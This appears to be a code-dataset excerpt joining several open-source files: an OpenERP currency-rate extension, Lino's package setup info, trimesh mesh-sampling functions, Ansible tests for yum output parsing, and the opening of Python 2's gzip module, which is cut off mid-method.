# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import osv
"""Inherit res.currency to handle accounting date values when converting currencies"""
class res_currency_account(osv.osv):
    """Extend res.currency so conversions can use an account's 'average'
    rate (derived from posted move lines) instead of the standard
    'at date' rate."""
    _inherit = "res.currency"
    def _get_conversion_rate(self, cr, uid, from_currency, to_currency, context=None):
        """Return the from_currency -> to_currency conversion rate.

        Starts from the standard rate, then overrides it when the context
        carries an account ('res.currency.compute.account') whose
        currency_mode is 'average': the rate becomes the ratio of the
        summed company-currency amounts (debit-credit) to the summed
        foreign-currency amounts on that account's move lines.
        'res.currency.compute.account_invert' flips the ratio.
        """
        if context is None:
            context = {}
        rate = super(res_currency_account, self)._get_conversion_rate(cr, uid, from_currency, to_currency, context=context)
        #process the case where the account doesn't work with an outgoing currency rate method 'at date' but 'average'
        account = context.get('res.currency.compute.account')
        account_invert = context.get('res.currency.compute.account_invert')
        if account and account.currency_mode == 'average' and account.currency_id:
            # _query_get() restricts move lines to the periods/journals
            # selected in the context.
            query = self.pool.get('account.move.line')._query_get(cr, uid, context=context)
            cr.execute('select sum(debit-credit),sum(amount_currency) from account_move_line l ' \
                       'where l.currency_id=%s and l.account_id=%s and '+query, (account.currency_id.id,account.id,))
            tot1,tot2 = cr.fetchone()
            # Guard against NULL/zero sums to avoid division by zero.
            if tot2 and not account_invert:
                rate = float(tot1)/float(tot2)
            elif tot1 and account_invert:
                rate = float(tot2)/float(tot1)
        return rate
| agpl-3.0 |
khchine5/book | lino_book/setup_info.py | 1 | 9355 | # -*- coding: UTF-8 -*-
# Copyright 2009-2018 Rumma & Ko Ltd
# License: BSD (see file COPYING for details)
# python setup.py test -s tests.test_misc.PackagesTests
from __future__ import unicode_literals
import sys
# Interpreter major-version flags used for conditional dependency choices.
PY2 = sys.version_info.major == 2
PY3 = sys.version_info.major == 3
SETUP_INFO = dict(
name='lino_book',
version='18.3.0',
install_requires=[
'lino', 'selenium','mock',
'django-iban', 'metafone', 'channels<2',
'djangorestframework', 'bleach', 'radicale==1.1.2',
'icalendar',
'vobject',
# 'eidreader',
'social-auth-app-django',
'lino_cosi',
'lino_noi',
'lino_voga',
# 'lino_welfare',
'requests_mock',
'lino_care',
'lino_vilma',
'lino_avanti',
'lino_tera',
'lino_amici',
'commondata', 'commondata.be', 'commondata.ee', 'commondata.eg'],
dependency_links=[
'git+https://github.com/cylonoven/django-mailbox.git#egg=django_mailbox'],
tests_require=['mock'],
description="Lino documentation and demo projects",
license='BSD License',
include_package_data=True,
zip_safe=False,
author='Luc Saffre',
author_email='luc@lino-framework.org',
url="http://www.lino-framework.org",
#~ test_suite = 'lino_book.projects',
test_suite='tests',
classifiers="""\
Programming Language :: Python
Programming Language :: Python :: 2
Programming Language :: Python :: 3
Development Status :: 5 - Production/Stable
Environment :: Web Environment
Framework :: Django
Intended Audience :: Developers
Intended Audience :: System Administrators
License :: OSI Approved :: BSD License
Natural Language :: English
Natural Language :: French
Natural Language :: German
Operating System :: OS Independent
Topic :: Database :: Front-Ends
Topic :: Home Automation
Topic :: Office/Business
Topic :: Software Development :: Libraries :: Application Frameworks""".splitlines())
# if PY2:
# SETUP_INFO['install_requires'].append('reportlab<2.7')
# else:
# SETUP_INFO['install_requires'].append('reportlab')
SETUP_INFO.update(long_description="""
.. image:: https://readthedocs.org/projects/lino/badge/?version=latest
:target: http://lino.readthedocs.io/en/latest/?badge=latest
.. image:: https://coveralls.io/repos/github/lino-framework/book/badge.svg?branch=master
:target: https://coveralls.io/github/lino-framework/book?branch=master
.. image:: https://travis-ci.org/lino-framework/book.svg?branch=stable
:target: https://travis-ci.org/lino-framework/book?branch=stable
.. image:: https://img.shields.io/pypi/v/lino.svg
:target: https://pypi.python.org/pypi/lino/
.. image:: https://img.shields.io/pypi/l/lino.svg
:target: https://pypi.python.org/pypi/lino/
This is the code repository that contains (1) the Sphinx source files
of the Lino Book, (2) the ``lino_book`` Python package and (3) a test
suite with doctest-based tests for the Lino framework.
The **Lino Book** is the central documentation tree of the Lino
framework. It is visible on `www.lino-framework.org
<http://www.lino-framework.org>`__ and on `lino.readthedocs.io
<http://lino.readthedocs.io>`__.
The ``lino_book`` Python package is a collection of small example Lino
applications used for educational and testing purposes.
The code repositories for the ``lino`` and ``lino_xl`` Python packages
have no documentation tree on their own and almost no unit tests, they
are tested and documented here.
""")
SETUP_INFO.update(packages=[str(n) for n in """
lino_book
lino_book.projects
lino_book.projects.babel_tutorial
lino_book.projects.babel_tutorial.fixtures
lino_book.projects.dumps
lino_book.projects.dumps.fixtures
lino_book.projects.dumps.settings
lino_book.projects.belref
lino_book.projects.belref.fixtures
lino_book.projects.belref.settings
lino_book.projects.combo
lino_book.projects.combo.fixtures
lino_book.projects.docs
lino_book.projects.docs.settings
lino_book.projects.estref
lino_book.projects.estref.settings
lino_book.projects.estref.tests
lino_book.projects.events
lino_book.projects.events.tests
lino_book.projects.polls
lino_book.projects.polls.polls
lino_book.projects.polls.polls.fixtures
lino_book.projects.polls.mysite
lino_book.projects.polly
lino_book.projects.polly.settings
lino_book.projects.polly.tests
lino_book.projects.20090714
lino_book.projects.20090717
lino_book.projects.20100126
lino_book.projects.20100127
lino_book.projects.20100206
lino_book.projects.20100212
lino_book.projects.20121124
lino_book.projects.chooser
lino_book.projects.example
lino_book.projects.properties
lino_book.projects.quantityfield
lino_book.projects.cms
lino_book.projects.cms.settings
lino_book.projects.crl
lino_book.projects.crl.fixtures
lino_book.projects.eric
lino_book.projects.eric.settings
lino_book.projects.eric.settings.fixtures
lino_book.projects.eric.tests
lino_book.projects.homeworkschool
lino_book.projects.homeworkschool.fixtures
lino_book.projects.homeworkschool.settings
lino_book.projects.i18n
lino_book.projects.igen
lino_book.projects.igen.tests
lino_book.projects.max
lino_book.projects.max.settings
lino_book.projects.chatter
lino_book.projects.chatter.settings
lino_book.projects.chatter.tests
lino_book.projects.min1
lino_book.projects.min1.settings
lino_book.projects.min2
lino_book.projects.min2.settings
lino_book.projects.min2.tests
lino_book.projects.min3
lino_book.projects.min3.lib
lino_book.projects.min3.lib.contacts
lino_book.projects.min3.lib.contacts.fixtures
lino_book.projects.min3.settings
lino_book.projects.min3.tests
lino_book.projects.min9
lino_book.projects.min9.modlib
lino_book.projects.min9.modlib.contacts
lino_book.projects.min9.modlib.contacts.fixtures
lino_book.projects.min9.modlib.contacts.management
lino_book.projects.min9.modlib.contacts.management.commands
lino_book.projects.min9.settings
lino_book.projects.min9.tests
lino_book.projects.apc
lino_book.projects.apc.settings
lino_book.projects.apc.tests
lino_book.projects.adg
lino_book.projects.adg.settings
lino_book.projects.adg.settings.fixtures
lino_book.projects.adg.tests
lino_book.projects.cosi_ee
lino_book.projects.cosi_ee.settings
lino_book.projects.pierre
lino_book.projects.pierre.settings
lino_book.projects.bs3
lino_book.projects.bs3.settings
lino_book.projects.bs3.tests
lino_book.projects.team
lino_book.projects.team.tests
lino_book.projects.team.settings
lino_book.projects.team.settings.fixtures
lino_book.projects.liina
lino_book.projects.liina.tests
lino_book.projects.liina.settings
lino_book.projects.liina.settings.fixtures
lino_book.projects.lydia
lino_book.projects.lydia.tests
lino_book.projects.lydia.settings
lino_book.projects.lydia.settings.fixtures
lino_book.projects.public
lino_book.projects.anna
lino_book.projects.anna.settings
lino_book.projects.anna.tests
lino_book.projects.anna.lib
lino_book.projects.anna.lib.tickets
lino_book.projects.public.settings
lino_book.projects.public.tests
lino_book.projects.lets1
lino_book.projects.lets1.lets
lino_book.projects.lets1.fixtures
lino_book.projects.lets2
lino_book.projects.lets2.lets
lino_book.projects.lets2.fixtures
lino_book.projects.mti
lino_book.projects.mti.app
lino_book.projects.mti.fixtures
lino_book.projects.mti.tests
lino_book.projects.nomti
lino_book.projects.nomti.app
lino_book.projects.nomti.fixtures
lino_book.projects.watch
lino_book.projects.watch.entries
lino_book.projects.watch.fixtures
lino_book.projects.watch.tests
lino_book.projects.watch2
lino_book.projects.watch2.fixtures
lino_book.projects.mldbc
lino_book.projects.mldbc.fixtures
lino_book.projects.actions
lino_book.projects.actors
lino_book.projects.actors.fixtures
lino_book.projects.addrloc
lino_book.projects.addrloc.fixtures
lino_book.projects.myroles
lino_book.projects.auto_create
lino_book.projects.de_BE
lino_book.projects.de_BE.fixtures
lino_book.projects.diamond
lino_book.projects.diamond.main
lino_book.projects.diamond2
lino_book.projects.diamond2.main
lino_book.projects.float2decimal
lino_book.projects.float2decimal.lib
lino_book.projects.float2decimal.lib.float2decimal
lino_book.projects.integer_pk
lino_book.projects.integer_pk.lib
lino_book.projects.integer_pk.lib.integer_pk
lino_book.projects.human
lino_book.projects.gfktest
lino_book.projects.gfktest.settings
lino_book.projects.gfktest.lib
lino_book.projects.gfktest.lib.gfktest
lino_book.projects.pisa
lino_book.projects.sendchanges
lino_book.projects.tables
lino_book.projects.tables.fixtures
lino_book.projects.ui5
lino_book.projects.ui5.settings
lino_book.projects.ui5.tests
lino_book.projects.vtables
lino_book.projects.edmund
lino_book.projects.edmund.settings
lino_book.projects.edmund.settings.fixtures
lino_book.projects.roger
lino_book.projects.roger.settings
lino_book.projects.roger.settings.fixtures
lino_book.projects.roger.tests
""".splitlines() if n])
# Babel message-extraction map: tells `setup.py extract_messages` which
# files under the 'lino' tree to scan for translatable strings and which
# extractor ('python', 'jinja2' or 'ignore') applies to each glob pattern.
SETUP_INFO.update(message_extractors={
    'lino': [
        ('**/sandbox/**', 'ignore', None),
        ('**/cache/**', 'ignore', None),
        ('**.py', 'python', None),
        ('**/linoweb.js', 'jinja2', None),
        #~ ('**.js', 'javascript', None),
        ('**/config/**.html', 'jinja2', None),
        #~ ('**/templates/**.txt', 'genshi', {
        #~ 'template_class': 'genshi.template:TextTemplate'
        #~ })
    ],
})
| bsd-2-clause |
dajusc/trimesh | trimesh/sample.py | 1 | 5718 | """
sample.py
------------
Randomly sample surface and volume of meshes.
"""
import numpy as np
from . import util
from . import transformations
def sample_surface(mesh, count):
    """
    Sample the surface of a mesh, returning the specified
    number of points
    For individual triangle sampling uses this method:
    http://mathworld.wolfram.com/TrianglePointPicking.html
    Parameters
    ---------
    mesh : trimesh.Trimesh
      Geometry to sample the surface of
    count : int
      Number of points to return
    Returns
    ---------
    samples : (count, 3) float
      Points in space on the surface of mesh
    face_index : (count,) int
      Indices of faces for each sampled point
    """
    # len(mesh.faces) float, array of the areas
    # of each face of the mesh
    area = mesh.area_faces
    # total area (float)
    area_sum = np.sum(area)
    # cumulative area (len(mesh.faces))
    area_cum = np.cumsum(area)
    # area-weighted face choice: a uniform pick on [0, area_sum) mapped
    # through the cumulative areas lands on larger faces more often
    face_pick = np.random.random(count) * area_sum
    face_index = np.searchsorted(area_cum, face_pick)
    # pull triangles into the form of an origin + 2 vectors
    tri_origins = mesh.triangles[:, 0]
    tri_vectors = mesh.triangles[:, 1:].copy()
    tri_vectors -= np.tile(tri_origins, (1, 2)).reshape((-1, 2, 3))
    # pull the vectors for the faces we are going to sample from
    tri_origins = tri_origins[face_index]
    tri_vectors = tri_vectors[face_index]
    # randomly generate two 0-1 scalar components to multiply edge vectors by
    random_lengths = np.random.random((len(tri_vectors), 2, 1))
    # points will be distributed on a quadrilateral if we use 2 0-1 samples
    # if the two scalar components sum less than 1.0 the point will be
    # inside the triangle, so we find vectors longer than 1.0 and
    # transform them to be inside the triangle (reflect across the
    # quadrilateral's diagonal)
    random_test = random_lengths.sum(axis=1).reshape(-1) > 1.0
    random_lengths[random_test] -= 1.0
    random_lengths = np.abs(random_lengths)
    # multiply triangle edge vectors by the random lengths and sum
    sample_vector = (tri_vectors * random_lengths).sum(axis=1)
    # finally, offset by the origin to generate
    # (n,3) points in space on the triangle
    samples = sample_vector + tri_origins
    return samples, face_index
def volume_mesh(mesh, count):
    """
    Use rejection sampling to produce points randomly
    distributed in the volume of a mesh.
    Parameters
    ---------
    mesh : trimesh.Trimesh
      Geometry to sample
    count : int
      Number of points to return
    Returns
    ---------
    samples : (n, 3) float
      Points in the volume of the mesh where n <= count
    """
    # draw candidates uniformly inside the axis-aligned bounding box,
    # then keep only the ones that actually fall inside the mesh
    box_points = (np.random.random((count, 3)) * mesh.extents) + mesh.bounds[0]
    inside = mesh.contains(box_points)
    return box_points[inside][:count]
def volume_rectangular(extents,
                       count,
                       transform=None):
    """
    Return random samples inside a rectangular volume,
    useful for sampling inside oriented bounding boxes.
    Parameters
    ----------
    extents : (3,) float
      Side lengths of rectangular solid
    count : int
      Number of points to return
    transform : (4, 4) float
      Homogeneous transformation matrix
    Returns
    ---------
    samples : (count, 3) float
      Points in requested volume
    """
    # uniform in [-0.5, 0.5) per axis, then scale by the side lengths so
    # the solid is centered at the origin
    samples = (np.random.random((count, 3)) - .5) * extents
    if transform is not None:
        # move the samples into the requested frame
        samples = transformations.transform_points(samples, transform)
    return samples
def sample_surface_even(mesh, count, radius=None):
    """
    Sample the surface of a mesh, returning samples which are
    VERY approximately evenly spaced. This is accomplished by
    sampling and then rejecting pairs that are too close together.
    Note that since it is using rejection sampling it may return
    fewer points than requested (i.e. n < count). If this is the
    case a log.warning will be emitted.
    Parameters
    ---------
    mesh : trimesh.Trimesh
      Geometry to sample the surface of
    count : int
      Number of points to return
    radius : None or float
      Removes samples below this radius
    Returns
    ---------
    samples : (n, 3) float
      Points in space on the surface of mesh
    face_index : (n,) int
      Indices of faces for each sampled point
    """
    from .points import remove_close
    # guess radius from area
    if radius is None:
        radius = np.sqrt(mesh.area / (3 * count))
    # get points on the surface: oversample by 3x because the rejection
    # step below will discard close neighbors
    points, index = sample_surface(mesh, count * 3)
    # remove the points closer than radius
    points, mask = remove_close(points, radius)
    # we got all the samples we expect
    if len(points) >= count:
        return points[:count], index[mask][:count]
    # warn if we didn't get all the samples we expect
    util.log.warning('only got {}/{} samples!'.format(
        len(points), count))
    return points, index[mask]
def sample_surface_sphere(count):
    """
    Correctly pick random points on the surface of a unit sphere
    Uses this method:
    http://mathworld.wolfram.com/SpherePointPicking.html
    Parameters
    ----------
    count : int
      Number of points to return
    Returns
    ----------
    points : (count, 3) float
      Random points on the surface of a unit sphere
    """
    # two independent uniform [0, 1) draws per point
    u, v = np.random.random((2, count))
    # azimuth is uniform on [0, 2*pi); the polar angle goes through
    # arccos so points are uniform on the sphere rather than clustered
    # at the poles
    azimuth = np.pi * 2 * u
    polar = np.arccos((2 * v) - 1)
    # convert spherical coordinates to cartesian unit vectors
    spherical = np.column_stack((azimuth, polar))
    return util.spherical_to_vector(spherical)
| mit |
MihaiMoldovanu/ansible | test/units/modules/packaging/os/test_yum.py | 117 | 9276 |
# -*- coding: utf-8 -*-
from ansible.compat.tests import unittest
from ansible.modules.packaging.os import yum
yum_plugin_load_error = """
Plugin "product-id" can't be imported
Plugin "search-disabled-repos" can't be imported
Plugin "subscription-manager" can't be imported
Plugin "product-id" can't be imported
Plugin "search-disabled-repos" can't be imported
Plugin "subscription-manager" can't be imported
"""
# from https://github.com/ansible/ansible/issues/20608#issuecomment-276106505
wrapped_output_1 = """
Загружены модули: fastestmirror
Loading mirror speeds from cached hostfile
* base: mirror.h1host.ru
* extras: mirror.h1host.ru
* updates: mirror.h1host.ru
vms-agent.x86_64 0.0-9 dev
"""
# from https://github.com/ansible/ansible/issues/20608#issuecomment-276971275
wrapped_output_2 = """
Загружены модули: fastestmirror
Loading mirror speeds from cached hostfile
* base: mirror.corbina.net
* extras: mirror.corbina.net
* updates: mirror.corbina.net
empty-empty-empty-empty-empty-empty-empty-empty-empty-empty-empty-empty-empty-empty-empty-empty-empty-empty-empty-empty.x86_64
0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.1-0
addons
libtiff.x86_64 4.0.3-27.el7_3 updates
"""
# From https://github.com/ansible/ansible/issues/20608#issuecomment-276698431
wrapped_output_3 = """
Loaded plugins: fastestmirror, langpacks
Loading mirror speeds from cached hostfile
ceph.x86_64 1:11.2.0-0.el7 ceph
ceph-base.x86_64 1:11.2.0-0.el7 ceph
ceph-common.x86_64 1:11.2.0-0.el7 ceph
ceph-mds.x86_64 1:11.2.0-0.el7 ceph
ceph-mon.x86_64 1:11.2.0-0.el7 ceph
ceph-osd.x86_64 1:11.2.0-0.el7 ceph
ceph-selinux.x86_64 1:11.2.0-0.el7 ceph
libcephfs1.x86_64 1:11.0.2-0.el7 ceph
librados2.x86_64 1:11.2.0-0.el7 ceph
libradosstriper1.x86_64 1:11.2.0-0.el7 ceph
librbd1.x86_64 1:11.2.0-0.el7 ceph
librgw2.x86_64 1:11.2.0-0.el7 ceph
python-cephfs.x86_64 1:11.2.0-0.el7 ceph
python-rados.x86_64 1:11.2.0-0.el7 ceph
python-rbd.x86_64 1:11.2.0-0.el7 ceph
"""
# from https://github.com/ansible/ansible-modules-core/issues/4318#issuecomment-251416661
wrapped_output_4 = """
ipxe-roms-qemu.noarch 20160127-1.git6366fa7a.el7
rhelosp-9.0-director-puddle
quota.x86_64 1:4.01-11.el7_2.1 rhelosp-rhel-7.2-z
quota-nls.noarch 1:4.01-11.el7_2.1 rhelosp-rhel-7.2-z
rdma.noarch 7.2_4.1_rc6-2.el7 rhelosp-rhel-7.2-z
screen.x86_64 4.1.0-0.23.20120314git3c2946.el7_2
rhelosp-rhel-7.2-z
sos.noarch 3.2-36.el7ost.2 rhelosp-9.0-puddle
sssd-client.x86_64 1.13.0-40.el7_2.12 rhelosp-rhel-7.2-z
"""
# A 'normal-ish' yum check-update output, without any wrapped lines
unwrapped_output_rhel7 = """
Loaded plugins: etckeeper, product-id, search-disabled-repos, subscription-
: manager
This system is not registered to Red Hat Subscription Management. You can use subscription-manager to register.
NetworkManager-openvpn.x86_64 1:1.2.6-1.el7 epel
NetworkManager-openvpn-gnome.x86_64 1:1.2.6-1.el7 epel
cabal-install.x86_64 1.16.1.0-2.el7 epel
cgit.x86_64 1.1-1.el7 epel
python34-libs.x86_64 3.4.5-3.el7 epel
python34-test.x86_64 3.4.5-3.el7 epel
python34-tkinter.x86_64 3.4.5-3.el7 epel
python34-tools.x86_64 3.4.5-3.el7 epel
qgit.x86_64 2.6-4.el7 epel
rdiff-backup.x86_64 1.2.8-12.el7 epel
stoken-libs.x86_64 0.91-1.el7 epel
xlockmore.x86_64 5.49-2.el7 epel
"""
# Some wrapped obsoletes for prepending to output for testing both
wrapped_output_rhel7_obsoletes_postfix = """
Obsoleting Packages
ddashboard.x86_64 0.2.0.1-1.el7_3 mhlavink-developerdashboard
developerdashboard.x86_64 0.1.12.2-1.el7_2 @mhlavink-developerdashboard
python-bugzilla.noarch 1.2.2-3.el7_2.1 mhlavink-developerdashboard
python-bugzilla-develdashboardfixes.noarch
1.2.2-3.el7 @mhlavink-developerdashboard
python2-futures.noarch 3.0.5-1.el7 epel
python-futures.noarch 3.0.3-1.el7 @epel
python2-pip.noarch 8.1.2-5.el7 epel
python-pip.noarch 7.1.0-1.el7 @epel
python2-pyxdg.noarch 0.25-6.el7 epel
pyxdg.noarch 0.25-5.el7 @epel
python2-simplejson.x86_64 3.10.0-1.el7 epel
python-simplejson.x86_64 3.3.3-1.el7 @epel
Security: kernel-3.10.0-327.28.2.el7.x86_64 is an installed security update
Security: kernel-3.10.0-327.22.2.el7.x86_64 is the currently running version
"""
longname = """
Loaded plugins: fastestmirror, priorities, rhnplugin
This system is receiving updates from RHN Classic or Red Hat Satellite.
Loading mirror speeds from cached hostfile
xxxxxxxxxxxxxxxxxxxxxxxxxx.noarch
1.16-1 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
glibc.x86_64 2.17-157.el7_3.1 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"""
# Combined fixture: the plain RHEL 7 output plus the wrapped
# "Obsoleting Packages" section, which the parser must ignore.
unwrapped_output_rhel7_obsoletes = unwrapped_output_rhel7 + wrapped_output_rhel7_obsoletes_postfix
# Package names parse_check_update() is expected to report for the
# RHEL 7 fixtures above (with or without the obsoletes section).
unwrapped_output_rhel7_expected_pkgs = ["NetworkManager-openvpn", "NetworkManager-openvpn-gnome", "cabal-install",
                                        "cgit", "python34-libs", "python34-test", "python34-tkinter",
                                        "python34-tools", "qgit", "rdiff-backup", "stoken-libs", "xlockmore"]
class TestYumUpdateCheckParse(unittest.TestCase):
    """Exercise yum.parse_check_update() against captured 'yum check-update'
    output, including locale-wrapped lines, plugin noise and an obsoletes
    section (fixture strings are defined at module level above)."""
    def _assert_expected(self, expected_pkgs, result):
        """Assert result is a dict whose keys are exactly expected_pkgs."""
        for expected_pkg in expected_pkgs:
            self.assertIn(expected_pkg, result)
        self.assertEqual(len(result), len(expected_pkgs))
        self.assertIsInstance(result, dict)
    def test_empty_output(self):
        res = yum.parse_check_update("")
        expected_pkgs = []
        self._assert_expected(expected_pkgs, res)
    def test_longname(self):
        # package names long enough that yum pushes the version to the next line
        res = yum.parse_check_update(longname)
        expected_pkgs = ['xxxxxxxxxxxxxxxxxxxxxxxxxx', 'glibc']
        self._assert_expected(expected_pkgs, res)
    def test_plugin_load_error(self):
        # plugin import noise must not be mistaken for package lines
        res = yum.parse_check_update(yum_plugin_load_error)
        expected_pkgs = []
        self._assert_expected(expected_pkgs, res)
    def test_wrapped_output_1(self):
        res = yum.parse_check_update(wrapped_output_1)
        expected_pkgs = ["vms-agent"]
        self._assert_expected(expected_pkgs, res)
    def test_wrapped_output_2(self):
        res = yum.parse_check_update(wrapped_output_2)
        expected_pkgs = ["empty-empty-empty-empty-empty-empty-empty-empty-empty-empty-empty-empty-empty-empty-empty-empty-empty-empty-empty-empty",
                         "libtiff"]
        self._assert_expected(expected_pkgs, res)
    def test_wrapped_output_3(self):
        res = yum.parse_check_update(wrapped_output_3)
        expected_pkgs = ["ceph", "ceph-base", "ceph-common", "ceph-mds",
                         "ceph-mon", "ceph-osd", "ceph-selinux", "libcephfs1",
                         "librados2", "libradosstriper1", "librbd1", "librgw2",
                         "python-cephfs", "python-rados", "python-rbd"]
        self._assert_expected(expected_pkgs, res)
    def test_wrapped_output_4(self):
        res = yum.parse_check_update(wrapped_output_4)
        expected_pkgs = ["ipxe-roms-qemu", "quota", "quota-nls", "rdma", "screen",
                         "sos", "sssd-client"]
        self._assert_expected(expected_pkgs, res)
    def test_wrapped_output_rhel7(self):
        res = yum.parse_check_update(unwrapped_output_rhel7)
        self._assert_expected(unwrapped_output_rhel7_expected_pkgs, res)
    def test_wrapped_output_rhel7_obsoletes(self):
        # the obsoletes section must be ignored, leaving the same package set
        res = yum.parse_check_update(unwrapped_output_rhel7_obsoletes)
        self._assert_expected(unwrapped_output_rhel7_expected_pkgs, res)
| gpl-3.0 |
sillydan1/WhatEverEngine | openglcsharp/Lib/gzip.py | 78 | 18226 | """Functions that read and write gzipped files.
The user of the file doesn't have to worry about the compression,
but random access is not allowed."""
# based on Andrew Kuchling's minigzip.py distributed with the zlib module
import struct, sys, time, os
import zlib
import io
import __builtin__
__all__ = ["GzipFile","open"]
# Gzip member-header flag bits (RFC 1952): text hint, header CRC,
# extra field, original filename, comment.
FTEXT, FHCRC, FEXTRA, FNAME, FCOMMENT = 1, 2, 4, 8, 16
# Internal markers for GzipFile.mode.
READ, WRITE = 1, 2
def write32u(output, value):
    """Write *value* to *output* as a 4-byte little-endian unsigned integer.

    The '<L' format emits the raw bit pattern, so the full 32-bit range
    round-trips correctly.
    """
    packed = struct.pack("<L", value)
    output.write(packed)
def read32(input):
    """Read 4 bytes from *input* and return them as a little-endian unsigned int."""
    (value,) = struct.unpack("<I", input.read(4))
    return value
def open(filename, mode="rb", compresslevel=9):
    """Shorthand for GzipFile(filename, mode, compresslevel).

    The filename argument is required; mode defaults to 'rb'
    and compresslevel defaults to 9.
    """
    gzip_file = GzipFile(filename, mode, compresslevel)
    return gzip_file
class GzipFile(io.BufferedIOBase):
    """The GzipFile class simulates most of the methods of a file object with
    the exception of the readinto() and truncate() methods.
    """
    # File object opened by this class itself (when only a filename was
    # given); closed again in close().
    myfileobj = None
    max_read_chunk = 10 * 1024 * 1024 # 10Mb
    def __init__(self, filename=None, mode=None,
                 compresslevel=9, fileobj=None, mtime=None):
        """Constructor for the GzipFile class.
        At least one of fileobj and filename must be given a
        non-trivial value.
        The new class instance is based on fileobj, which can be a regular
        file, a StringIO object, or any other object which simulates a file.
        It defaults to None, in which case filename is opened to provide
        a file object.
        When fileobj is not None, the filename argument is only used to be
        included in the gzip file header, which may includes the original
        filename of the uncompressed file. It defaults to the filename of
        fileobj, if discernible; otherwise, it defaults to the empty string,
        and in this case the original filename is not included in the header.
        The mode argument can be any of 'r', 'rb', 'a', 'ab', 'w', or 'wb',
        depending on whether the file will be read or written. The default
        is the mode of fileobj if discernible; otherwise, the default is 'rb'.
        Be aware that only the 'rb', 'ab', and 'wb' values should be used
        for cross-platform portability.
        The compresslevel argument is an integer from 1 to 9 controlling the
        level of compression; 1 is fastest and produces the least compression,
        and 9 is slowest and produces the most compression. The default is 9.
        The mtime argument is an optional numeric timestamp to be written
        to the stream when compressing. All gzip compressed streams
        are required to contain a timestamp. If omitted or None, the
        current time is used. This module ignores the timestamp when
        decompressing; however, some programs, such as gunzip, make use
        of it. The format of the timestamp is the same as that of the
        return value of time.time() and of the st_mtime member of the
        object returned by os.stat().
        """
        # guarantee the file is opened in binary mode on platforms
        # that care about that sort of thing
        if mode and 'b' not in mode:
            mode += 'b'
        if fileobj is None:
            fileobj = self.myfileobj = __builtin__.open(filename, mode or 'rb')
        if filename is None:
            if hasattr(fileobj, 'name'): filename = fileobj.name
            else: filename = ''
        if mode is None:
            if hasattr(fileobj, 'mode'): mode = fileobj.mode
            else: mode = 'rb'
        if mode[0:1] == 'r':
            self.mode = READ
            # Set flag indicating start of a new member
            self._new_member = True
            # Buffer data read from gzip file. extrastart is offset in
            # stream where buffer starts. extrasize is number of
            # bytes remaining in buffer from current stream position.
            self.extrabuf = ""
            self.extrasize = 0
            self.extrastart = 0
            self.name = filename
            # Starts small, scales exponentially
            self.min_readsize = 100
        elif mode[0:1] == 'w' or mode[0:1] == 'a':
            self.mode = WRITE
            self._init_write(filename)
            # Negative wbits: raw deflate stream; this class writes the gzip
            # header and trailer itself.
            self.compress = zlib.compressobj(compresslevel,
                                             zlib.DEFLATED,
                                             -zlib.MAX_WBITS,
                                             zlib.DEF_MEM_LEVEL,
                                             0)
        else:
            raise IOError, "Mode " + mode + " not supported"
        self.fileobj = fileobj
        self.offset = 0
        self.mtime = mtime
        if self.mode == WRITE:
            self._write_gzip_header()
    @property
    def filename(self):
        # Deprecated alias for the .name attribute; in write mode a ".gz"
        # suffix is appended if missing.
        import warnings
        warnings.warn("use the name attribute", DeprecationWarning, 2)
        if self.mode == WRITE and self.name[-3:] != ".gz":
            return self.name + ".gz"
        return self.name
    def __repr__(self):
        # Wrap the underlying file object's repr inside "<gzip ...>".
        s = repr(self.fileobj)
        return '<gzip ' + s[1:-1] + ' ' + hex(id(self)) + '>'
    def _check_closed(self):
        """Raises a ValueError if the underlying file object has been closed.
        """
        if self.closed:
            raise ValueError('I/O operation on closed file.')
    def _init_write(self, filename):
        # Reset per-stream write state: running CRC32 and uncompressed size.
        self.name = filename
        self.crc = zlib.crc32("") & 0xffffffffL
        self.size = 0
        self.writebuf = []
        self.bufsize = 0
    def _write_gzip_header(self):
        # Emit the RFC 1952 member header: magic, method, flags, mtime,
        # extra-flags byte, OS byte, then the optional original filename.
        self.fileobj.write('\037\213') # magic header
        self.fileobj.write('\010') # compression method
        fname = os.path.basename(self.name)
        if fname.endswith(".gz"):
            fname = fname[:-3]
        flags = 0
        if fname:
            flags = FNAME
        self.fileobj.write(chr(flags))
        mtime = self.mtime
        if mtime is None:
            mtime = time.time()
        write32u(self.fileobj, long(mtime))
        self.fileobj.write('\002')
        self.fileobj.write('\377')
        if fname:
            # Filename is NUL-terminated per the gzip format.
            self.fileobj.write(fname + '\000')
    def _init_read(self):
        # Reset per-member read state before decoding a new gzip member.
        self.crc = zlib.crc32("") & 0xffffffffL
        self.size = 0
    def _read_gzip_header(self):
        # Parse and validate the member header, skipping all optional fields.
        magic = self.fileobj.read(2)
        if magic != '\037\213':
            raise IOError, 'Not a gzipped file'
        method = ord( self.fileobj.read(1) )
        if method != 8:
            raise IOError, 'Unknown compression method'
        flag = ord( self.fileobj.read(1) )
        self.mtime = read32(self.fileobj)
        # extraflag = self.fileobj.read(1)
        # os = self.fileobj.read(1)
        self.fileobj.read(2)
        if flag & FEXTRA:
            # Read & discard the extra field, if present
            xlen = ord(self.fileobj.read(1))
            xlen = xlen + 256*ord(self.fileobj.read(1))
            self.fileobj.read(xlen)
        if flag & FNAME:
            # Read and discard a null-terminated string containing the filename
            while True:
                s = self.fileobj.read(1)
                if not s or s=='\000':
                    break
        if flag & FCOMMENT:
            # Read and discard a null-terminated string containing a comment
            while True:
                s = self.fileobj.read(1)
                if not s or s=='\000':
                    break
        if flag & FHCRC:
            self.fileobj.read(2) # Read & discard the 16-bit header CRC
    def write(self,data):
        # Compress *data* onto the underlying file, updating CRC and size.
        self._check_closed()
        if self.mode != WRITE:
            import errno
            raise IOError(errno.EBADF, "write() on read-only GzipFile object")
        if self.fileobj is None:
            raise ValueError, "write() on closed GzipFile object"
        # Convert data type if called by io.BufferedWriter.
        if isinstance(data, memoryview):
            data = data.tobytes()
        if len(data) > 0:
            self.size = self.size + len(data)
            self.crc = zlib.crc32(data, self.crc) & 0xffffffffL
            self.fileobj.write( self.compress.compress(data) )
            self.offset += len(data)
        return len(data)
    def read(self, size=-1):
        # Return up to *size* uncompressed bytes (all remaining if size < 0),
        # refilling the internal buffer via _read() in growing chunks.
        self._check_closed()
        if self.mode != READ:
            import errno
